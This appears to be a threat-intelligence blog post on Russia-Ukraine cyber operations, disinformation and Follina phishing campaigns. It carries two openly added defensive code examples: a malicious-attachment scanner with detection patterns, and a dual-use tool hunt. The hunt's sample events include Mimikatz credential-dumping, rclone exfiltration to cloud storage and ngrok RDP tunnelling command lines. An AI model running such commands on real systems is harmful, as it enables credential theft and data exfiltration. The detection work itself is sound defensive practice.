Published on February 28th, 2023
Russia – Ukraine Cyber Warfare August Update
Since the military invasion of Ukraine, both Russia and Ukraine continue to conduct cyberattacks to gain information, cause disruption and create a climate of intimidation. Additionally, many threat actors and groups have announced their support of one country or the other, groups have split, and others have turned on each other due to the conflict. As tensions have escalated, Optiv’s Global Threat Intelligence Center (gTIC) has provided periodic updates on Russian military actions and estimated cyber-related implications in advisories and Optiv Source Zero blog posts on February 4, February 22, February 24 and June 30. In this update, we’ll provide information on the events of the previous 30 days and what we can expect looking forward.
Destructive cyberattacks have been one part of Russia’s strategic movement through Ukraine. But as other countries have come to Ukraine’s aid, Russia has moved its targeting beyond Ukraine’s borders. While most of the cyberattacks targeting Ukraine were wiper attacks meant to cause disruptions and distractions that facilitated the physical advance of Russia’s military, cyberattacks targeting other countries have been found to be espionage attacks. There have been 128 reported targets in 42 countries that represent a range of strategic espionage targets. Nearly half of the targets were government agencies and roughly 12% were within the Institutions and Organizations vertical, which includes humanitarian groups providing aid to Ukraine’s civilian population and supporting refugees. The remaining victims were companies involved in critical defense or other economic support.
Figure 1: Countries outside Ukraine targeted by Russian cyber espionage since the start of the war in Ukraine (Source: Microsoft)
Most attacks have targeted NATO members, and Russia’s cyber espionage attacks have included organizations in the United States. Additional attacks have targeted Poland, Latvia, Lithuania, Denmark, Norway, Finland and Sweden. According to Microsoft, the attacks launched by Russia against countries other than Ukraine have been successful 29% of the time. Russian APT groups have extremely sophisticated capabilities to implant code, obtain and exfiltrate sensitive information and deploy additional malware payloads.
Disinformation Campaigns
Disinformation campaigns serve to create a sense of distrust and division between allies and neighbors. Disinformation clouds judgement and weakens the collective response of allies while their focus is on establishing the facts. Both delays in response and division can have catastrophic consequences during a time of war. Security researchers with Google’s Threat Analysis Group (TAG) reported that in the month of June 2022, four YouTube channels and one AdSense account were terminated in relation to coordinated influence operations linked to Russia and Azerbaijan.
People around the world have turned to social media, including Facebook, Twitter, TikTok and YouTube, to stay updated on the Russia/Ukraine war. Ukrainians use these platforms to show the real effects this war is having on cities and individuals, as well as to raise money for supporting refugees and gain support from other countries. Russia uses the same platforms to obscure facts about the situation and spread disinformation and misinformation.
Several Telegram channels have been identified spreading misinformation, including a post on May 10, 2022, from an account claiming that Polish forces, along with troops from Lithuania, were planning to invade western Ukraine on May 22, 2022. Other disinformation campaigns have attempted to undermine and divide the Western coalition, including articles posted on both Russia Today (RT) and South Front. An article from June 09, 2022, stated that Western citizens are less likely to believe in their leaders, but more likely to support their government’s decisions to place sanctions against Russia. Another article published on June 03, 2022, claimed that the U.S. government has made beating Russia in Ukraine a top priority while sacrificing the safety and needs of its citizens.
Lastly, efforts have been made to portray refugees from Ukraine in a negative light to citizens of the countries to which they are fleeing. Russian news and Telegram sources, including interviews posted on June 07, 2022, featured alleged Russian citizens living in Poland stating that Russians were being denied employment and rental opportunities, enduring psychological pressure from Ukrainian refugees and were afraid of being attacked by them.
Figure 2: Identified memes that depict alleged German sentiment toward Ukrainian migrants. (Source: Recorded Future)
In addition to undermining and dividing the Western coalition on Ukraine, multiple disinformation campaigns have aimed at portraying Ukraine as the source of Nazism and modern-day fascist movements. This misinformation is Likely meant to reduce Western support for Ukraine and influence public opinion of Russia in this war. On June 06, 2022, an article in Global Research, a pro-Kremlin website, stated that the U.S., which fought against Nazis in WWII, is now training and financially supporting Nazis in Ukraine.
Disinformation and misinformation can come from all types of sources, including Russian state media organizations, pro-Russian accounts, social media, fake groups, alternative theory groups and individuals that wish to support Russia’s actions. Oftentimes these statements and accusations are supported only by unverified sources or are poorly sourced in general. It’s Likely that Russian supporters will continue to spread disinformation to garner additional support for Russia and attempt to divide the Western coalition.
Continued Cyberattacks
In June 2022, the Russian government warned the U.S. and its allies that they risk a “direct military clash” if cyberattacks on its infrastructure continue. In June 2022, the website of Russia’s Ministry of Construction, Housing and Utilities was hacked and defaced, with the message “Glory to Ukraine” posted on the homepage. Russia’s foreign ministry blamed threat actors in the U.S. and Ukraine for the increasing attacks on critical infrastructure and state institutions. Websites of Russian state-owned companies (banks, airlines and alcohol distribution portals) and government agencies have been increasingly targeted in DDoS attacks. Other attacks have included espionage and wiper malware attacks.
While Russia faces increased attacks from threat actors across the world, Ukraine continues to face cyberattacks from Russian state-backed APT groups and from threat actors acting in support of Russia’s actions. Turla, an advanced persistent threat group attributed to Russia’s Federal Security Service (FSB), was observed hosting Android apps on a domain spoofing the Ukrainian Azov, a unit of the National Guard of Ukraine. The apps were hosted on a domain controlled by the actor and disseminated via links on third-party messaging services. Turla distributed the app under the guise of performing Denial of Service (DoS) attacks against a set of Russian websites. However, the purported “DoS” consisted of only a single GET request per target.
Both APT28 and Sandworm, Russian APT groups, were observed conducting campaigns exploiting the Follina vulnerability (CVE-2022-30190). One campaign conducted by Sandworm involved phishing emails with the subject “LIST of links to interactive maps” carrying a malicious document attachment. The attackers targeted more than 500 recipients at various media organizations in Ukraine. Sandworm has targeted Ukraine consistently over the previous 24 months, and its activity has increased significantly since the Russian invasion of Ukraine.
In July 2022, the Computer Emergency Response Team of Ukraine (CERT-UA) warned that the Russia-based APT group APT28 was believed to be sending emails containing a malicious document named “Nuclear Terrorism A Very Real Threat.rtf”. The attackers Likely used this name to lure victims into opening the attachment, exploiting the fear Ukrainians have of a potential nuclear attack. The document attempted to exploit the Follina vulnerability to download and launch the CredoMap malware on a target’s device. CredoMap is information-stealing malware that has previously been used by APT28 against Ukrainian organizations.
Another attack, by a threat actor tracked as UAC-0098, delivered phishing emails carrying malicious documents with the Follina exploit inside password-protected archives, impersonating the State Tax Service of Ukraine. Based on overlaps in infrastructure, tools and a unique crypter, it has been assessed with Moderate Confidence that this threat actor is a former Initial Access Broker that worked with the Conti ransomware group. The threat actor deployed a Cobalt Strike beacon, which is frequently used to deploy ransomware against victims.
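The three campaigns above share one delivery pattern: an Office or RTF attachment that, when opened, pulls content from an attacker-controlled URL to trigger CVE-2022-30190. The following triage scanner is an added example written for this update, not code from the Optiv post or from CERT-UA. Its indicators are assumptions drawn from public descriptions of the technique: an OOXML relationship that fetches an OLE object or attached template from an external URL, an auto-updating linked object in an RTF file, or any reference to the `ms-msdt` protocol handler. The sample documents it builds are constructed in memory and contain no payload.

```python
"""Mail-gateway style triage for Office/RTF attachments that reach out to remote
content (the delivery pattern reported for Follina / CVE-2022-30190 lures).
Added example; the heuristics are assumptions, not a complete detection."""
import io
import re
import zipfile

# Relationship types that have no business pointing at a remote URL in an attachment.
# Hyperlinks are also "External" relationships but are normal, so they are ignored.
RISKY_REL_TYPES = {"oleobject", "attachedtemplate"}
REL_RE = re.compile(r"<Relationship\b[^>]*>", re.I)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')
MSDT_RE = re.compile(rb"ms-msdt", re.I)
URL_RE = re.compile(rb"https?://[^\s\"'<>{}\\]+", re.I)


def scan_docx(data: bytes) -> list:
    """Return findings for an OOXML package (docx/xlsx/pptx) held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            content = zf.read(name)
            if MSDT_RE.search(content):
                findings.append(f"{name}: references ms-msdt protocol handler")
            if not name.endswith(".rels"):
                continue
            for rel in REL_RE.findall(content.decode("utf-8", errors="replace")):
                attrs = {k.lower(): v for k, v in ATTR_RE.findall(rel)}
                rel_type = attrs.get("type", "").rsplit("/", 1)[-1].lower()
                target = attrs.get("target", "")
                if attrs.get("targetmode", "").lower() == "external" and rel_type in RISKY_REL_TYPES:
                    findings.append(f"{name}: external {rel_type} -> {target}")
    return findings


def scan_rtf(data: bytes) -> list:
    """Return findings for an RTF file: ms-msdt references or auto-updating linked objects."""
    findings = []
    if MSDT_RE.search(data):
        findings.append("rtf: references ms-msdt protocol handler")
    # \objautlink marks a linked OLE object; \objupdate forces it to refresh on open.
    if re.search(rb"\\objautlink|\\objupdate", data):
        urls = [u.decode("ascii", errors="replace") for u in URL_RE.findall(data)]
        if urls:
            findings.append("rtf: auto-updating linked object with remote URL(s): " + ", ".join(urls))
        else:
            # Link targets are usually hex-encoded inside \objdata, so absence of a plain URL
            # is not a clean bill of health.
            findings.append("rtf: auto-updating linked object (no plain URL visible; inspect \\objdata)")
    return findings


def triage(filename: str, data: bytes) -> list:
    """Dispatch on container magic; anything unrecognised goes to a sandbox instead."""
    if data[:2] == b"PK":
        return scan_docx(data)
    if data[:5] == b"{\\rtf":
        return scan_rtf(data)
    return [f"{filename}: unrecognised container, send to sandbox"]


def build_docx(external_ole_target=None) -> bytes:
    """Construct a minimal OOXML package in memory (constructed sample, not a real lure).
    It always carries a benign external hyperlink; optionally an external OLE relationship."""
    ns = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
    rels = [f'<Relationship Id="rId1" Type="{ns}hyperlink" '
            f'Target="https://example.invalid/" TargetMode="External"/>']
    if external_ole_target:
        rels.append(f'<Relationship Id="rId2" Type="{ns}oleObject" '
                    f'Target="{external_ole_target}" TargetMode="External"/>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", "<Relationships>" + "".join(rels) + "</Relationships>")
    return buf.getvalue()


if __name__ == "__main__":
    samples = {
        "benign.docx": build_docx(),
        "lure.docx": build_docx("http://example.invalid/remote.html"),  # constructed URL
        "benign.rtf": b"{\\rtf1 quarterly report}",
        "lure.rtf": b"{\\rtf1{\\object\\objautlink\\objupdate{\\*\\objdata 0105}}}",
    }
    for fname, blob in samples.items():
        print(fname, "->", triage(fname, blob) or "clean")
```

The scanner deliberately ignores external hyperlinks, which are common in legitimate mail, and keys on the two relationship types that drive remote content into the document; a hit is a reason to detonate the file in a sandbox, not a verdict on its own.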
Looking forward
Along with heavy warfare and fighting in Ukraine between armies, cyberspace has become and remains a secondary battlefield between Russia and Ukraine. Additionally, Russia-based threat actors have targeted countries that are supporting Ukraine, including the EU and the U.S. It’s Likely that both countries will continue to expand their cyberattacks in an attempt to collect intelligence and disrupt operations. It is Likely that Russian cybercriminals and supporters will continue disinformation campaigns in an attempt to gain support for the war and divide the Western coalition.
Alongside the physical conflict of Russia’s invasion of Ukraine, it’s Likely that cyber adversaries, regardless of attribution, will continue to leverage and employ techniques, tools and vulnerabilities used in previous cyberattacks and campaigns. Threat actors are Likely to target known vulnerabilities, including older (2+ years) vulnerabilities, in widely used software and services to gain access to victim networks. This is Likely because the same techniques continue to succeed while requiring minimal resources, since attackers can reuse open-source and commercially available tools, software and malware.
In addition to multiple vulnerabilities, it’s Likely that cybercriminals will target or abuse common software, services and tools in the coming months, such as:
- RDP
- SMB/Samba
- UPnP
- Oracle WebLogic
- Microsoft Exchange
- Microsoft SharePoint
- VMware vCenter, ESXi, vSphere, vAccess
- VPN clients – Pulse Secure, Fortinet Fortigate, Citrix Gateway
- Jenkins
- Content Management System (CMS) platforms – WordPress, Joomla!, Drupal, Magento, Adobe Commerce
- Mimikatz
- AdFind
- AnyDesk
- Rclone
- Ngrok reverse proxy
- Zoho ManageEngine
- LogMeIn
- TeamViewer
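Several entries in the list above (Mimikatz, AdFind, Rclone, Ngrok, AnyDesk, LogMeIn, TeamViewer) are dual-use tools that are also installed legitimately, so the defensive question is which executions are out of place. The hunt below is an added example written for this update, not code from the Optiv post; the event format, host names, user names and the allow-list are constructed, and the ATT&CK technique mappings beyond those in the table that follows (T1018, T1087, T1219, T1567, T1572) are the editor’s. It fires on the tool’s file name or on its command-line syntax, so a renamed binary is still caught.

```python
"""Hunt over endpoint process-creation telemetry for dual-use tooling.
Added example with constructed events; rules are heuristics, not a full ruleset."""
import re

# Rule table: (tool, regex on image file name, regex on command line or None,
#              ATT&CK technique, analyst note). Either pattern alone fires.
RULES = [
    ("Mimikatz", r"mimikatz", r"sekurlsa::|lsadump::|privilege::debug", "T1003", "credential dumping"),
    ("AdFind", r"adfind", r"-f\s+\(?objectcategory=", "T1018/T1087", "Active Directory enumeration"),
    # rclone syntax: <verb> <source> <remote>:<path>; a Windows drive letter ("D:\") is excluded
    ("Rclone", r"rclone", r"\b(copy|sync|move)\b\s+\S+\s+\w+:(?!\\)\S+", "T1567", "bulk copy to cloud storage"),
    ("Ngrok", r"ngrok", r"\b(tcp|http)\s+\d{2,5}\s*$", "T1572", "tunnel exposing a local port"),
    ("AnyDesk", r"anydesk", None, "T1219", "remote access software"),
    ("TeamViewer", r"teamviewer", None, "T1219", "remote access software"),
    ("LogMeIn", r"logmein", None, "T1219", "remote access software"),
]

# Constructed sample events; any real deployment would read these from an EDR or Sysmon feed.
SAMPLE_EVENTS = [
    {"host": "WS-042", "user": "j.doe", "image": r"C:\Users\j.doe\AppData\Local\Temp\svc.exe",
     "cmdline": 'svc.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"host": "DC-01", "user": "svc_backup", "image": r"C:\ProgramData\rc.exe",
     "cmdline": r"rc.exe copy C:\Shares\Finance mega:dump --transfers 32"},
    {"host": "IT-JUMP-01", "user": "admin", "image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "cmdline": "TeamViewer.exe"},
    {"host": "WS-017", "user": "m.smith", "image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "cmdline": "TeamViewer.exe"},
    {"host": "WS-042", "user": "j.doe", "image": r"C:\Users\j.doe\Downloads\ngrok.exe",
     "cmdline": "ngrok.exe tcp 3389"},
    {"host": "WS-099", "user": "a.lee", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c copy C:\Reports\q2.xlsx D:\Archive\ "},
]

# (host, tool) pairs where the tool is sanctioned, e.g. the IT jump host running TeamViewer.
ALLOWLIST = frozenset({("IT-JUMP-01", "TeamViewer")})


def normalise_image(image: str) -> str:
    """Reduce a full image path to its lower-cased file name."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def hunt(events, allowlist=frozenset()) -> list:
    """Return one alert dict per (event, rule) match, skipping allow-listed (host, tool) pairs."""
    alerts = []
    for ev in events:
        image = normalise_image(ev["image"])
        cmd = ev.get("cmdline", "")
        for tool, img_re, cmd_re, technique, note in RULES:
            by_name = re.search(img_re, image, re.I) is not None
            by_syntax = cmd_re is not None and re.search(cmd_re, cmd, re.I) is not None
            if not (by_name or by_syntax) or (ev["host"], tool) in allowlist:
                continue
            alerts.append({
                "host": ev["host"], "user": ev["user"], "tool": tool, "technique": technique,
                "reason": "image name" if by_name else "command-line syntax (possibly renamed binary)",
                "note": note, "cmdline": cmd,
            })
    return alerts


if __name__ == "__main__":
    for a in hunt(SAMPLE_EVENTS, ALLOWLIST):
        print(f"{a['host']:<11} {a['user']:<11} {a['tool']:<11} {a['technique']:<12} {a['reason']} | {a['cmdline']}")
```

Two of the four alerts on the sample data come from command-line syntax alone (the renamed Mimikatz and Rclone binaries), which is the case a name-only rule misses; the plain `copy` to a drive letter on WS-099 is left alone by the Rclone rule, and the jump host’s TeamViewer is suppressed by the allow-list rather than by weakening the rule.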
Tactics and Techniques:
| Tactic | Technique ID | Technique |
|---|---|---|
| Reconnaissance | T1593 | Search Open Websites/Domains |
| | T1595.002 | Active Scanning: Vulnerability Scanning |
| Resource Development | T1587.003 | Develop Capabilities: Digital Certificates |
| | T1586 | Compromise Accounts |
| | T1584.005 | Compromise Infrastructure: Botnet |
| Initial Access | T1133 | External Remote Services |
| | T1190 | Exploit Public-Facing Application |
| | T1566 | Phishing |
| | T1078 | Valid Accounts |
| | T1199 | Trusted Relationship |
| Execution | T1072 | Software Deployment Tools |
| | T1059 | Command and Scripting Interpreter |
| | T1203 | Exploitation for Client Execution |
| | T1204 | User Execution |
| | T1204.001 | User Execution: Malicious Link |
| | T1204.002 | User Execution: Malicious File |
| Persistence | T1053 | Scheduled Task/Job |
| | T1098 | Account Manipulation |
| Privilege Escalation | T1611 | Escape to Host / Exploitation for Privilege Escalation |
| | T1078.001 | Valid Accounts: Default Accounts |
| | T1078.002 | Valid Accounts: Domain Accounts |
| Defense Evasion | T1127 | Trusted Developer Utilities Proxy Execution |
| | T1497 | Virtualization/Sandbox Evasion |
| | T1562.001 | Impair Defenses: Disable or Modify Tools |
| | T1562.002 | Impair Defenses: Disable Windows Event Logging |
| | T1055.001 | Process Injection: Dynamic-link Library Injection |
| Credential Access | T1212 | Exploitation for Credential Access |
| | T1003 | OS Credential Dumping |
| | T1110 | Brute Force |
| Discovery | T1120 | Peripheral Device Discovery |
| | T1083 | File and Directory Discovery |
| | T1135 | Network Share Discovery |
| | T1518 | Software Discovery |
| Lateral Movement | T1210 | Exploitation of Remote Services |
| | T1570 | Lateral Tool Transfer |
| Collection | T1213 | Data from Information Repositories |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
| Impact | T1485 | Data Destruction |
| | T1486 | Data Encrypted for Impact |
| | T1489 | Service Stop |
| | T1498.001 | Network Denial of Service: Direct Network Flood |
| | T1531 | Account Access Removal |
It’s Likely that the U.S. and other Western coalition countries will remain attractive targets for Russia-based threat actors seeking financial gain and conducting espionage attacks. It’s Likely that if the United States imposes harsher and broader sanctions and embargoes on Russia, the fallout will result in nearly all ransomware groups being placed under severe restrictions through the U.S. Treasury’s Office of Foreign Assets Control (OFAC). This would leave ransomware victims in the U.S. unable to consider negotiations and payments in exchange for preventing data leaks and retrieving decryption keys for compromised files and systems.
When Russia invaded Ukraine, U.S.-based organizations began pulling their business from Russia. Multiple ransomware groups, including REvil, Conti and LockBit 2.0, are based in Russia and target multiple U.S.-based organizations daily. The sophistication and technical knowledge of the ransomware groups, the NotPetya attacks and nation-state groups – such as APT28, APT29 and Sandworm – highlight Russia’s ability to create severe disruption and chaos in the United States. U.S.-based organizations are a historically attractive target, and it’s Likely that U.S. companies will continue to be targeted, whether by threat actors based in Russia or by those in support of the Kremlin’s invasion of Ukraine.
References
https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE50KOK
https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag/
https://blog.google/threat-analysis-group/tag-bulletin-q2-2022/
https://t.me/baltnews/14510
https://www.rt.com/russia/556770-west-anti-russia-propaganda/?utm
https://www.globalresearch.ca/us-battled-ww-ii-nazis-today-us-side-by-side-ukraine/5782550
https://southfront.org/the-u-s-governments-top-priority-now-is-to-defeat-russia-in-ukraine/
https://go.recordedfuture.com/hubfs/reports/ta-2022-0707.pdf
https://cert.gov.ua/article/339662
https://cert.gov.ua/article/341128